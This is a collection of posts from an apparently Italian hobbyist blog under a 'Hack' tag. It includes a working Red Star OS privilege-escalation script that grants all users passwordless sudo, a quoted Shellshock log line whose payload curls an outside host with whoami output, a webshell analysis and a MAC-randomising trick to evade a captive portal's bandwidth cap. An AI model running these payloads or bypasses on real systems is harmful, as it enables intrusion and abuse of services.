Visualizzazione post con etichetta Hack. Mostra tutti i post
Visualizzazione post con etichetta Hack. Mostra tutti i post

lunedì 10 luglio 2023

Hacking camping wifi

Al campegggio il servizio Wifi era gratuito ma il portale captivo era impostato per un limite di banda dopo la quale non potevi navigare fino al giorno successivo
la soluzione e' stata semplicemente quella di impostare il Mac Address della scheda wireless su Random. Ogni volta che arrivavo al limite di banda consumata mi e' bastato spengere e riaccendere il WiFi per assumere un nuovo Mac Address e continuare a navigare


martedì 12 maggio 2020

Damn Vulnerable Web Application

Mi sto leggendo avanza tempo il libro HackLog  Manuale di Sicurezza Informatica ed Hacking Etico di Stefano Novelli. Nel libro viene  DVWA - Damn Vulnerable Web Application, una applicazione web studiata appositamente per fare pratica con le vulnerabilita' principalmente di webserver

Si puo' ottenere la DVWA da questo link in formato iso o docker. Ho scelto la ISO ma ho scoperto su Debian Testing VirtualBox non ne vuole sapere di installarsi....sono passato a QEmu

qemu-system-x86_64 -cdrom  DVWA-1.0.7.iso -m 2G -enable-kvm -net user,hostfwd=tcp::8080-:80 -net nic

a questo punto basta puntare il browser su  http://localhost:8080/login.php con credenziali admin/password



Di esempi ce ne sono tanti ma molto semplici ad impegnativi.

venerdì 29 gennaio 2016

Hacking Red Star 3.0

Red Star e' un sistema operativo basato su Linux, probabilmente da una Fedora, creato da governo della Nord Corea con l'evidente scopo di tracciare e limitare le attivita' online dei propri utenti,
La notizia della fuga della iso del sistema operativo e' piuttosto vecchiotta cosi' come il sistema per hackerare il sistema ma e' un ottimo esempio di come si puo', su un sistema solido come Linux, effettuare una scalata di privilegi con metodi banali (ovvero senza ricorrere a buffer overflow od exploit particolari) basandosi su una pessima configurazione del sistema

La iso puo' essere scaricata da questo link

Finestra di Login di RedStar

Attenzione : e' fortemente consigliato di giocare con RedStar soltanto all'interno di una macchina virtuale disconnettendo l'interfaccia di rete virtuale ed evitando qualsiasi tipo di condivisione con il filesystem reale o chiavette USB reali (Red Star effettua di nascosto un watermark di tutti i file che scansiona)

Il primo ostacolo che si incontra nella installazione della iso e' che e' tutta (ovviamente) in coreano quindi bisogna andare un po' a caso. Essendo comunque solo una traduzione e non una modifica del procedimento base e' piuttosto semplice concludere il processo

Schermata dell'installazione

A questo punto ho provato a raggiungere una shell. Usando le combinazioni di tasti CTRL+ALT+Fx si ha che su F1 si ha una shell testuale ma a cui non si puo' effettuare il login mentre su F2 si ha X, nessuna altra shell virtual


In realta' frugando nei menu si trova un Xterm. Si deve cliccare sull'icona in basso per aprire il menu dei programmi.


Poi cliccando sulla quarta icona da sinistra nella riga piu' in alto della finestra soprastante (icona del folder verde) si accede alla schermata sottostante


Si clicca sul folder con martello e chiave (che dovrebbe essere qualcosa tipo Utility) e si arriva finalmente all'icona del terminale


Una volta ottenuta la shell si ha il problema che digitando sulla tastiera compaiono caratteri coreani ed e' quindi impossibile digitare i comandi Unix. La soluzione e' quella di premere a lungo e rilasciare il tasto Alt-Gr, a questo punto dovrebbero comparire i caratteri latini e si puo' procedere

e qui inizia la vera e propria scalata dei privilegi
la debolezza del sistema risiede tutta nella cattiva configurazione dei permessi nel file /etv/udev/rules.d/85-hpjl10xx.rules che e' settato come 777
RedStar e' impostato per impedire l'esecuzione di file di sistema ed ovviamente l'utente normale non puo' utilizzare sudo. Pero' il file in esame viene eseguito in fase di boot come root/admin.
Il gioco sta semplicemente nel modificare il file (perche' e' comunque scrivibile) e riavviare il computer per eseguire i comandi aggiunti per prendere il controllo della macchina



lo script (trovato qui) e' il seguente
semplicemente vengono aggiunti tutti gli utenti alla lista sudoers .. di una semplicita' disarmante
---------------------------------------------
 #!/bin/bash -e
 cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
 echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
 cat <<EOF >/tmp/r00t.sh
 echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
 mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
 chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
 rm /tmp/r00t.sh
 EOF
 chmod +x /tmp/r00t.sh
 echo "sudo will be available after reboot"
 sleep 2
 reboot
---------------------------------------------







giovedì 28 maggio 2015

Hack a keyboard

Hack nel senso di migliorare....
Sto lavorando ad un progetto per modificare una tastiera Usb per renderla un footswitch per cambiare pagina su uno spartito elettronico di MuseScore (cio' non mi rendera' sicuramente un miglior musicista ma sicuramente piu' geek)


L'elettronica di una tastiera USB e' molto ridotta ed e' concentrata sullo su una schedina, il resto e' solo una matrice di fili per arrivare alla posizione dei tasti.
Il connettore e' di tipo a 26 piste divise in due sezioni da 13. Cortocircuitando una coppia di pista si simula la pressione di un tasto


Le tastiere generano di solito un codice di scansione per i tasti standard e due codici di scansione per i tasti speciali (per esempio i tasti di espansione aggiungono il codice 224 mentre il tastierino numerico ha come predecessore il codice 0)


A me interessava cercare la combinazione PageUp e PageDown.
Cosi' mediante il seguente programmino in Python mi sono messo a cortocircuitare coppie di piste e trascrivere su una griglia il risultato
------------------------------------------------------
from msvcrt import getch
import sys
z_old = "a"
while True:
    z = getch()
    # escape key to exit
    if ord(z) == 27:
        break
    if (z != z_old):
        print ord(z)
        sys.stdout.flush()
        z_old = z
------------------------------------------------------


Con una buona dose di fortuna ho trovato quasi subito la combinazione giusta
13/18 : PageUp
13/19 : PageDown

lunedì 6 ottobre 2014

ShellShock Scanning

Come prevedibile si cominciano a vedere passare nei log dei server i tentativi di utilizzare la vulnerabilita' di Bash ShellShock

Ecco come si presenta un tentativo di exploit
(la riga xxxxxx.org indica il nome del server che e' sottoposto ad attacco)

xx.xxx.xx.xxx - - [05/Oct/2014:11:53:00 +0200] "GET / HTTP/1.1" 200 88868 "-" "() { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=xxxxxxxxxx.org\\&whoami=`whoami`\""

in pratica si tratta di una enumerazione piu' che di un attacco. Lo script controlla se la macchina e' vulnerabile a ShellShock ed in caso positivo si collega al sito ntontomou.com aggiornando la pagina ping.php per creare un elenco
La cosa interessante e' che oltre al nome del dominio viene passato anche il risultato del comando whoami credo per mostrare con che utente viene gestito il webserver (tipo www-data)

Cercando tracce di ShellShock ho trovato anche questa richiesta

xx.xxxx.xxx.xxx - - [29/Sep/2014:11:53:39 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 519 "-" "-"

da una ricerca non si tratta di una scansione ShellShock ma si cerca di sfruttare una vulnerabilita' di router Cisco o Linksys (peccato che le macchine scansionate siano tutte Linux)

martedì 30 settembre 2014

404.php


Frugando su un server alla ricerca di anomalie mi e' caduto l'occhio su un file denominato 404.php in una posizione anomala

Richiamato dal browser assomiglia ad una normale pagina di errore 404 (File not found) di Apache ma la dimensione del file era decisamente anomala per un messaggio cosi' corto


Con un po' di attenzione al di sotto delle scritte c'erano anche 4 pallini che hanno attirato la mia attenzione
Aprendo il codice Php era evidente che non si trattava di un errore 404 ma di un malware. In pratica i pallini indicano il campo di inserimento di una password attraverso la quale si accede ad una shell in Php

La password e' gia' crittata in md5 e non ho modo di conoscerla ma avendo il sorgente e' facile sostituire la stringa md5 con la stringa md5 di una propria password

Fatto cio' si accede ad una finestra di amministraizone che mette a nudo la configurazione della macchina per l'attaccante
Nella finestra sottostante viene mostrato il file /etc/passwd


e' altresi' disponibile un file manager che permette di navigare tutto il filesystem (a meno di non mettere il webserver in chroot)


e' possibile effettuare una scansione del file system alla ricerca di cattive configurazioni


c'e' anche una funzione che apre una backdoor su una porta a scelta per esporre una shell

In un buona sostanza un pessimo ospite da avere su una propria macchina

lunedì 14 gennaio 2013

Hacking IRig per Ipod Touch 2 Gen

Mi sono comprato su un sito cinese l'IRig, un connettore che permette di utilizzare l'Ipod Touch/IPhone come Stomp Box ed amplificatore per chitarra utilizzando il software Amplitube. L'affare era conveniente perche', spese di spedizione inclusa, il costo e' stato di circa 1/3 inferiore a quello di negozio

IRig
Il problema e' che una volta collegata al mio IPod Touch il software non riconosceva l'ingresso microfonico a cui e' attaccata di fatto la chitarra
Lasciata passare una notte di pensatoio ho inserito il jack di un auricolare di un telefono Samsung ed improvvisamente il software ha individuato il nuovo ingresso...era rotto l'IRig????

dal confronto della foto sottostante si vede che il jack dell'IRig (a sinistra) e dell'auricolare (a destra) sono differenti e considerando la curvatura dello chassis dell'Ipod Touch questo poteva dare qualche problema

Confronto tra jack (notare la differente lunghezza della parte metallica)
Mi sono dotato quindi di un taglierino ed ho tagliato circa 3 mm di plastica al jack dell'IRig (fortunatamente la plastica e' di tipo morbido e quindi non ci sono stati problemi)


Una volta collegato l'IRig modificato all'Ipod Touch l'ingresso della chitarra viene riconosciuto con la richiesta se utilizzare le cuffie o lo speaker dell'Ipod



Ed ecco alla fine il tutto assemblato

venerdì 13 gennaio 2012

Hacking Access Point WG602w4

Tempo fa avevo bisogno di estendere la copertura di una rete WiFi e cosi' ho cercato di acquistare un Access Point con modalita' Repeater. Il simpatico negoziante mi ha venduto un AP, anche abbastanza costoso, dicendo "Certo che funziona come repeater..c'e' scritto sulla scatola!!"
Dopo un giorno di prove ho letto su Internet che il WG602w4 funziona come repeater solo con altri AP della stessa ditta (??)

Ho quindi modificato il software dell'AP montando DD-WRT (http://www.dd-wrt.com/site/index), un firmware basato su Linux con una procedura ben descritta sul sito e andata liscia come l'olio






Una volta terminato lo scatolotto era pieno di nuove funzionalita' tra cui il repeater che ha funzionato a meraviglia....certe che un po' fa pensare di spendere soldi (anche abbastanza) per un hardware limitato poi dal software che ci gira sopra....

Debugger integrato ESP32S3

Aggiornamento In realta' il Jtag USB funziona anche sui moduli cinesi Il problema risiede  nell'ID USB della porta Jtag. Nel modulo...